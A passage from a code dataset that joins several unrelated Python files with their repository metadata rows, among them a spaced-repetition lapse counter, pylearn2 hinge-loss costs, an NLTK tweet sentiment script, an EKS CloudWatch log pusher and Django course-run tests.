graduation_interval and pre_graduation_interval in the format "4 days",
"10 min", etc
Date input in the format of "DD-MM-YY"
"""
df = tbl_reviews()
if start_date:
date = pd.to_datetime(start_date, format="%d-%m-%y")
df = df[df.Review_ID > date]
if end_date:
date = pd.to_datetime(end_date, format="%d-%m-%y")
df = df[df.Review_ID < date]
track_lapses = []
wrong_count = 0
right_count = 0
def track_lapse_stats(row) -> None:
nonlocal track_lapses
nonlocal wrong_count
nonlocal right_count
is_learning = row['Review_Type'] == 'Learning'
is_last_step = (
row['Review_New_Interval'] == pd.Timedelta(graduation_interval) and
row['Review_Last_Interval'] == pd.Timedelta(pre_graduation_interval)
)
if is_learning and is_last_step:
track_lapses.append(row['Card_ID'])
# the very next review after card_ID is stored will be the first review
# after learning
# however, to make sure the card hasnt seen reset to new, check the card
# isnt new (i.e. 'Learning'). if new, remove card from list
elif row['Card_ID'] in track_lapses:
if row['Review_Type'] == 'Learning':
track_lapses.remove(row['Card_ID'])
elif row['Review_Answer'] == 'Wrong':
wrong_count += 1
else:
right_count += 1
track_lapses.remove(row['Card_ID'])
df.apply(track_lapse_stats, axis=1)
print("Right:", right_count)
print("Wrong:", wrong_count)
print("Fraction Correct:", right_count / (right_count + wrong_count))
| 29.483333 | 81 | 0.596099 | 462 | 3,538 | 4.335498 | 0.201299 | 0.065901 | 0.035946 | 0.023964 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0 | 0.005225 | 0.296778 | 3,538 | 119 | 82 | 29.731092 | 0.799839 | 0.201526 | 0 | 0.821918 | 0 | 0 | 0.107942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054795 | false | 0 | 0.013699 | 0 | 0.068493 | 0.082192 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa827e294f9285097e86e2726f649c0eddadd157 | 3,415 | py | Python | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | """
Hinge loss costs.
"""
__authors__ = 'Jesse Livezey, Brian Cheung'
from theano.compat.python2x import OrderedDict
from pylearn2.costs.cost import Cost, DefaultDataSpecsMixin
from pylearn2.expr.nnet import HingeL2, HingeL1, Misclass
class HingeLoss(DefaultDataSpecsMixin, Cost):
supervised = True
def get_monitoring_channels(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
rval = OrderedDict()
name = model.layers[-1].layer_name+'_misclass'
rval[name] = Misclass(Y, Y_hat)
return rval
def expr(self, model, data):
raise ValueError('Abstract HingeLoss class '
+'should not be used directly.')
class HingeLossL2(HingeLoss):
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
cost = HingeL2(Y, Y_hat)
cost.name = 'hingel2'
return cost
class HingeLossL1(HingeLoss):
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
cost = HingeL1(Y, Y_hat)
cost.name = 'hingel1'
return cost
class DropoutHingeLossL2(HingeLoss):
def __init__(self, default_input_include_prob=.5, input_include_probs=None,
default_input_scale=2., input_scales=None, per_example=True):
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self.__dict__.update(locals())
del self.self
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.dropout_fprop(
X,
default_input_include_prob=self.default_input_include_prob,
input_include_probs=self.input_include_probs,
default_input_scale=self.default_input_scale,
input_scales=self.input_scales,
per_example=self.per_example)
cost = HingeL2(Y, Y_hat)
cost.name = 'hingel2'
return cost
class DropoutHingeLossL1(HingeLoss):
def __init__(self, default_input_include_prob=.5, input_include_probs=None,
default_input_scale=2., input_scales=None, per_example=True):
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self.__dict__.update(locals())
del self.self
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.dropout_fprop(
X,
default_input_include_prob=self.default_input_include_prob,
input_include_probs=self.input_include_probs,
default_input_scale=self.default_input_scale,
input_scales=self.input_scales,
per_example=self.per_example)
cost = HingeL1(Y, Y_hat)
cost.name = 'hingel1'
return cost
| 32.836538 | 87 | 0.595022 | 394 | 3,415 | 4.873096 | 0.200508 | 0.1 | 0.088542 | 0.071875 | 0.755729 | 0.745313 | 0.745313 | 0.745313 | 0.745313 | 0.745313 | 0 | 0.009495 | 0.321523 | 3,415 | 103 | 88 | 33.15534 | 0.819163 | 0.004978 | 0 | 0.792683 | 0 | 0 | 0.034513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.036585 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa9380f4b2ce3efca51bbd6da3de1f92185f4f1f | 6,825 | py | Python | main_NLTK.py | Jordan396/Twitter-Sentiment-Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | 10 | 2019-10-12T01:40:25.000Z | 2021-11-28T19:03:56.000Z | main_NLTK.py | JordanTanCH/Basic_Twitter_Sentiment_Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | null | null | null | main_NLTK.py | JordanTanCH/Basic_Twitter_Sentiment_Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | 5 | 2019-04-17T02:34:56.000Z | 2021-01-29T21:47:05.000Z | '''
Python 3.6, Python NLTK model
This file contains the code required to test the various models under the Python NLTK model.
The results will be written into their individual output file in a CSV format.
Instructions to execute the file can be found at the bottom of the file.
'''
import csv
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk import tokenize
import tweetCleaner
import tweetProcesser
sentiment = SentimentIntensityAnalyzer()
def NLTKCleanRaw():
'''
Raw NLTK model
'''
tweet_counter = 0
with open("results_nltk_raw.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("raw_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanAbbrev():
"""
NLTK model with extended abbreviations
"""
tweet_counter = 0
tweetProcesser.abbreviation_extender()
with open("results_nltk_abbrev.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("abbreviations_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanEmoji():
"""
NLTK model with emoticon scoring
"""
tweet_counter = 0
with open("results_nltk_emoji.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("raw_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet,total_score = tweetProcesser.emoticon_score(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanAbbrevEmoji():
"""
NLTK model with extended abbreviations AND emoticon scoring
"""
tweet_counter = 0
tweetProcesser.abbreviation_extender()
with open("results_nltk_abbrev_emoji.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("abbreviations_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet,total_score = tweetProcesser.emoticon_score(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for line in lines_list:
ss = sentiment.polarity_scores(line)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
print("====================TEST BEGIN=======================")
'''
BASIC: This is the main function we will be executing.
It combines all the cleaning and processing steps described in the GitHub README.
Run this script in your python command shell.
'''
NLTKCleanAbbrevEmoji()
'''
ADVANCED: Sometimes, performing excessive cleaning operations on the input may worsen the accuracy of the model.
Hence, here are several other models you may wish to test for accuracy comparison.
The description of the models may be found under the individual functions above.
To test a model, simply comment the above "Basic" model and uncomment any of the models below.
Run this script in your python command shell.
'''
#NLTKCleanRaw()
#NLTKCleanAbbrev()
#NLTKCleanEmoji()
print("====================TEST END=========================")
| 31.451613 | 112 | 0.675751 | 783 | 6,825 | 5.773946 | 0.205619 | 0.084052 | 0.029197 | 0.024773 | 0.782791 | 0.761115 | 0.761115 | 0.738996 | 0.722628 | 0.722628 | 0 | 0.007718 | 0.202637 | 6,825 | 217 | 113 | 31.451613 | 0.823043 | 0.069011 | 0 | 0.856061 | 0 | 0 | 0.117358 | 0.040056 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.037879 | 0 | 0.068182 | 0.075758 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa98dc8a73ac60c704da20d603a503d790b1f93f | 537 | py | Python | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | 1 | 2020-04-15T23:23:27.000Z | 2020-04-15T23:23:27.000Z | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | null | null | null | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | null | null | null | from adept import static_maps
if __name__ == '__main__':
stats = static_maps.compute_impact_stats(
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_40/random_impact_0',
'sediment',
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_vectors/feature_40.shp',
5,
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_40/watershed_lulc.tif')
print stats
| 44.75 | 129 | 0.769088 | 69 | 537 | 5.57971 | 0.492754 | 0.093506 | 0.163636 | 0.21039 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0 | 0.029851 | 0.126629 | 537 | 11 | 130 | 48.818182 | 0.791045 | 0 | 0 | 0 | 0 | 0.333333 | 0.679702 | 0.649907 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aab450edb54fecbaa8f47b8dd83fee30ef31b389 | 2,818 | py | Python | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | 26 | 2021-11-29T17:54:59.000Z | 2022-03-28T10:00:11.000Z | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | null | null | null | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | 2 | 2021-12-03T19:10:54.000Z | 2022-02-08T09:34:57.000Z | import boto3
import time
#commented for enhancements
# def log_creator(regionName,cluster_name):
# logs = boto3.client('logs',region_name=regionName)
# LOG_GROUP = 'cluster-' + cluster_name + '-' + regionName
# LOG_STREAM = cluster_name + '-' + regionName + '-'+'eks-update-logs-streams'
# is_exist_group = len(logs.describe_log_groups(
# logGroupNamePrefix=LOG_GROUP,
# ).get('logGroups')) > 0
# if not is_exist_group:
# logs.create_log_group(logGroupName=LOG_GROUP)
# is_stream_existing = len(logs.describe_log_streams(
# logGroupName=LOG_GROUP,
# logStreamNamePrefix=LOG_STREAM
# )['logStreams']
# ) > 0
# if not is_stream_existing:
# logs.create_log_stream(logGroupName=LOG_GROUP,
# logStreamName=LOG_STREAM)
# response =response = logs.describe_log_streams(
# logGroupName=LOG_GROUP,
# logStreamNamePrefix=LOG_STREAM
# )
def logs_pusher(regionName,cluster_name,msg):
logs = boto3.client('logs',region_name=regionName)
LOG_GROUP = 'cluster-' + cluster_name + '-' + regionName
LOG_STREAM = cluster_name + '-' + regionName + '-'+'eks-update-logs-streams'
is_exist_group = len(logs.describe_log_groups(
logGroupNamePrefix=LOG_GROUP,
).get('logGroups')) > 0
if not is_exist_group:
logs.create_log_group(logGroupName=LOG_GROUP)
is_stream_existing = len(logs.describe_log_streams(
logGroupName=LOG_GROUP,
logStreamNamePrefix=LOG_STREAM
)['logStreams']
) > 0
if not is_stream_existing:
logs.create_log_stream(logGroupName=LOG_GROUP,
logStreamName=LOG_STREAM)
response =response = logs.describe_log_streams(
logGroupName=LOG_GROUP,
logStreamNamePrefix=LOG_STREAM
)
try:
timestamp = int(round(time.time() * 1000))
event_log = {
'logGroupName': LOG_GROUP,
'logStreamName': LOG_STREAM,
'logEvents': [
{
'timestamp': timestamp,
'message': str(msg)
}], }
if 'uploadSequenceToken' in response['logStreams'][0]:
event_log.update({'sequenceToken': response['logStreams'][0] ['uploadSequenceToken']})
response = logs.put_log_events(**event_log)
except Exception as e:
timestamp = int(round(time.time() * 1000))
event_log = {
'logGroupName': LOG_GROUP,
'logStreamName': LOG_STREAM,
'logEvents': [
{
'timestamp': timestamp,
'message': str(msg)
}], }
event_log.update({'sequenceToken': str(e).split(" ")[-1]})
response = logs.put_log_events(**event_log)
return
| 32.767442 | 98 | 0.608588 | 284 | 2,818 | 5.757042 | 0.214789 | 0.078287 | 0.122324 | 0.044037 | 0.824465 | 0.824465 | 0.824465 | 0.785321 | 0.785321 | 0.785321 | 0 | 0.008811 | 0.275018 | 2,818 | 85 | 99 | 33.152941 | 0.791483 | 0.311923 | 0 | 0.44898 | 0 | 0 | 0.126239 | 0.011998 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.040816 | 0 | 0.081633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aabeac65b7ab2d6b3b2ebad791c71667e44e5c59 | 121 | py | Python | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | from GrADim.forward_mode import ForwardMode
from GrADim.GrADim import Gradim
from GrADim.reverse_mode import ReverseMode
| 30.25 | 43 | 0.876033 | 17 | 121 | 6.117647 | 0.470588 | 0.288462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099174 | 121 | 3 | 44 | 40.333333 | 0.954128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ac634fdccf1c087931eb1cd84282d03e07d6716 | 246 | py | Python | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | # pylint: disable=unused-import,missing-docstring
from deepr.examples.movielens.layers.loss import BPRLoss
from deepr.examples.movielens.layers.transformer import TransformerModel
from deepr.examples.movielens.layers.average import AverageModel
| 41 | 72 | 0.861789 | 30 | 246 | 7.066667 | 0.566667 | 0.127358 | 0.240566 | 0.367925 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 246 | 5 | 73 | 49.2 | 0.921739 | 0.191057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2af5ccf2e682803ae39882c32baea4e080c0299c | 7,620 | py | Python | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | """
Unit tests for the Course model
"""
from datetime import timedelta
from django.test import TestCase
from django.utils import timezone
from richie.apps.courses.factories import CourseFactory, CourseRunFactory
class CourseRunModelsTestCase(TestCase):
"""
Unit test suite for computing a date to display on the course glimpse depending on the state
of its related course runs:
0: a run is on-going and open for enrollment > "closing on": {enrollment_end_date}
1: a run is future and open for enrollment > "starting on": {start_date}
2: a run is future and not yet open or already closed for enrollment >
"starting on": {start_date}
3: a run is on-going but closed for enrollment > "on going": {None}
4: there's a finished run in the past > "archived": {None}
5: there are no runs at all > "coming soon": {None}
"""
def setUp(self):
super().setUp()
self.now = timezone.now()
def create_run_ongoing_closed(self, course):
"""Create an on-going course run that is closed for enrollment."""
return CourseRunFactory(
course=course,
start=self.now - timedelta(hours=1),
end=self.now + timedelta(hours=1),
enrollment_end=self.now - timedelta(hours=1),
)
def create_run_archived(self, course):
"""Create an archived course run."""
return CourseRunFactory(
course=course, start=self.now - timedelta(hours=1), end=self.now
)
def create_run_future_not_yet_open(self, course):
"""Create a course run in the future and not yet open for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=2),
enrollment_start=self.now + timedelta(hours=1),
)
def create_run_future_closed(self, course):
"""Create a course run in the future and already closed for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=1),
enrollment_start=self.now - timedelta(hours=2),
enrollment_end=self.now - timedelta(hours=1),
)
def create_run_future_open(self, course):
"""Create a course run in the future and open for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=1),
enrollment_start=self.now - timedelta(hours=1),
enrollment_end=self.now + timedelta(hours=1),
)
def test_models_course_glimpse_info_coming_soon(self):
"""
Confirm glimpse datetime result when there is no course runs at all.
"""
course = CourseFactory()
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "coming soon"}
)
def test_models_course_glimpse_date_archived(self):
"""
Confirm glimpse datetime result when there is a course run only in the past.
"""
course = CourseFactory()
self.create_run_archived(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "archived"}
)
def test_models_course_glimpse_date_ongoing_enrollment_closed(self):
"""
Confirm glimpse datetime result when there is an on-going course run but closed for
enrollment.
"""
course = CourseFactory()
self.create_run_ongoing_closed(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "on-going"}
)
def test_models_course_glimpse_date_future_enrollment_not_yet_open(self):
"""
Confirm glimpse datetime result when there is a future course run but not yet open for
enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_not_yet_open(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": None,
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding an on-going but closed course run should not change the result
self.create_run_ongoing_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_future_enrollment_closed(self):
"""
Confirm glimpse datetime result when there is a future course run but closed for
enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_closed(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": None,
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding an on-going but closed course run should not change the result
self.create_run_ongoing_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_future_enrollment_open(self):
"""
Confirm glimpse datetime result when there is a future course run open for enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_open(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": "enroll now",
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding courses in less priorietary states should not change the result
self.create_run_ongoing_closed(course)
self.create_run_future_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_ongoing_open(self):
"""
Confirm glimpse datetime result when there is an on-going course run open for enrollment.
"""
course = CourseFactory()
course_run = CourseRunFactory(
course=course,
start=self.now - timedelta(hours=1),
end=self.now + timedelta(hours=2),
enrollment_end=self.now + timedelta(hours=1),
)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": "enroll now",
"datetime": course_run.enrollment_end,
"text": "closing on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding courses in less priorietary states should not change the result
self.create_run_ongoing_closed(course)
self.create_run_future_closed(course)
self.create_run_future_open(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
| 38.291457 | 97 | 0.637402 | 893 | 7,620 | 5.254199 | 0.115342 | 0.07971 | 0.051151 | 0.067136 | 0.835891 | 0.802856 | 0.777067 | 0.76428 | 0.735294 | 0.696505 | 0 | 0.005823 | 0.278871 | 7,620 | 198 | 98 | 38.484848 | 0.848044 | 0.235564 | 0 | 0.607692 | 0 | 0 | 0.035091 | 0 | 0 | 0 | 0 | 0 | 0.169231 | 1 | 0.1 | false | 0 | 0.030769 | 0 | 0.176923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
630c7f6d05617b51a31a1d2c3f8e9ca321fb9bb4 | 2,467 | py | Python | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | 1 | 2021-04-10T03:28:50.000Z | 2021-04-10T03:28:50.000Z | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | null | null | null | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright (C) 2019-2020. Huawei Technologies Co., Ltd. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for aicore cube."""
from tensorflow import Tensor
from tensorflow.python.eager import context
from npu_bridge.helper import helper
gen_npu_ops = helper.get_gen_ops()
def lamb_apply_optimizer_assign(input0, input1, input2, input3, mul0_x, mul1_x,
mul2_x, mul3_x, add2_y, steps, do_use_weight, weight_decay_rate, name=None):
if context.executing_eagerly():
raise RuntimeError("tf.lamb_apply_optimizer_assign() is not compatible with "
"eager execution.")
update, nextv, nextm = gen_npu_ops.lamb_apply_optimizer_assign(input0, input1, input2, input3, mul0_x, mul1_x, mul2_x,
